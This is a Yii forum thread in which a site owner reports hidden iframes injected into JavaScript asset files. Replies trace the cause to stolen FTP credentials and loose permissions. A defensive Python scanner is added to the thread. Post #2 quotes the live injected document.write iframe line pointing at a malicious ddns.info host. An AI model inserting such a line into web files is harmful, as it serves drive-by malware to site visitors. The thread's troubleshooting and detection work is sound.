Yii Framework Forum: Urgent, Iframes Being Inserted Into Yii Extensions - Yii Framework Forum


Urgent, Iframes Being Inserted Into Yii Extensions

#1 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 10 December 2012 - 08:10 AM

Hi guys. A few days ago, my site was detected by Google as a disseminator of malware, with a red screen asking whether the user wanted to continue anyway or not. I found the "Webmaster Tools" tool and added my site. That tool showed me the file that was detected as a threat, and it was jnotify.js (Jnotify extension, inside the assets directory).

I looked inside the file and I noticed that there was an iframe at the end of the file with a strange URL. So, I excluded the extension because I was not using it, and I asked Google for a review and the problem was solved. But many users were sending me emails saying that the antivirus was detecting threats in many JS files inside the assets directory.

I looked inside them and again I noticed that there was an iframe at the end of the file, but with the Google URL "http://google.com", so I removed all iframes inside the files, but the iframes at the end of the files appeared again, so I excluded every directory inside the assets directory and apparently the problem was solved.

Today, I received an email with the antivirus diagnosis showing that the same files were detected as a threat a second time. The URL in the iframes is: http://cvrtyi.ddns.info.

I don't know what or who is inserting these malicious iframes at the end of the JavaScript files in the assets folder. Please, someone help me solve this problem.

Thanks
0

#2 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 10 December 2012 - 08:16 AM

Just to add information. This is the code being entered:

document.write('<iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs.ddns.info/nighttrend.cgi?8"></iframe>  ');

0

#3 User is offline   JCJ 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 20
  • Joined: 19-November 12

Posted 10 December 2012 - 11:36 PM

This is a hidden iframe "injection" attack. Validate your file permissions are correct and also that your FTP credentials have not been compromised. The last time I dealt with this the FTP account credentials were compromised and the files were being modified that way. There are other ways this could be happening, but that is the most likely. Check your logs to confirm.
0

#4 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 11 December 2012 - 06:10 AM

Ok.

Thank you very much!
0

#5 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 11 December 2012 - 06:16 AM

The problem is that the assets directory needs permission to write, and it is precisely in this directory that the files are being modified. The octal of this directory is set as: rwxrwxrwx.

That's right?
0

#6 User is offline   faridplus 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 93
  • Joined: 28-March 12

Posted 11 December 2012 - 11:59 AM

Felipe_Moreira, on 11 December 2012 - 06:16 AM, said:

The problem is that the assets directory needs permission to write, and it is precisely in this directory that the files are being modified. The octal of this directory is set as: rwxrwxrwx.

That's right?

What do you mean it needs permission to write?! Your users don't have to have write access to this directory. You should change its permission to rwxr-xr-x. If your host is Linux then you can run this command to make that happen:
chmod -R 755 assets
What you give is what you get (WYGIWYG)

If you liked my post, just give it a +1. That's all!
1
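
A defensive check for the two conditions discussed in this thread, the `document.write` iframe quoted in post #2 and the rwxrwxrwx mode from post #5, as an added example that is not part of any forum post. The function names, the sample tree and the `injected.example.invalid` URL are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Matches document.write('<iframe ... src="...">') and captures the src value.
INJECTED = re.compile(
    r"document\.write\(\s*['\"]\s*<iframe\b[^>]*\bsrc=['\"]?([^'\" >]+)", re.I)

def scan_assets(root):
    """Return (injected, world_writable): [(js path, iframe src)], [o+w paths]."""
    injected, world_writable = [], []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in [os.curdir] + filenames:  # "." checks the directory itself
            path = os.path.normpath(os.path.join(dirpath, name))
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # a symlink's own mode bits are not meaningful
            if mode & stat.S_IWOTH:
                world_writable.append(path)
            if stat.S_ISREG(mode) and name.endswith(".js"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for m in INJECTED.finditer(fh.read()):
                        injected.append((path, m.group(1)))
    return sorted(injected), sorted(world_writable)

def build_sample(root):
    """Constructed sample tree: one clean file, one with an appended iframe."""
    assets = os.path.join(root, "assets", "ab12cd34")
    os.makedirs(assets)
    clean, bad = os.path.join(assets, "clean.js"), os.path.join(assets, "jnotify.js")
    with open(clean, "w") as fh:
        fh.write("function notify(msg) { return msg; }\n")
    with open(bad, "w") as fh:
        fh.write("function notify(msg) { return msg; }\n"
                 "document.write('<iframe width=\"10\" height=\"10\" "
                 "src=\"http://injected.example.invalid/x.cgi?8\"></iframe>');\n")
    for path, mode in ((os.path.dirname(assets), 0o755), (assets, 0o777),
                       (clean, 0o644), (bad, 0o644)):  # 0o777 = rwxrwxrwx
        os.chmod(path, mode)
    return assets, bad

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        hits, writable = scan_assets(tmp)
        for path, src in hits:
            print("INJECTED", path, src)
        for path in writable:
            print("WORLD-WRITABLE", path)
```

A hit in either list means the files need to be replaced from a clean copy and the cause found; the scan only reports what is currently on disk.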

#7 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 18 December 2012 - 02:31 PM

Hi guys. I solved the problem by changing all the passwords of the FTP client and the permissions of the app files. I deleted the app that was in production and I uploaded another clean one. I will never use Microsoft Windows again, because my PC was infected by a trojan that caused this nightmare. My tip is: do not use Microsoft Windows computers that access the application server.

Thank you guys for your replies.
0
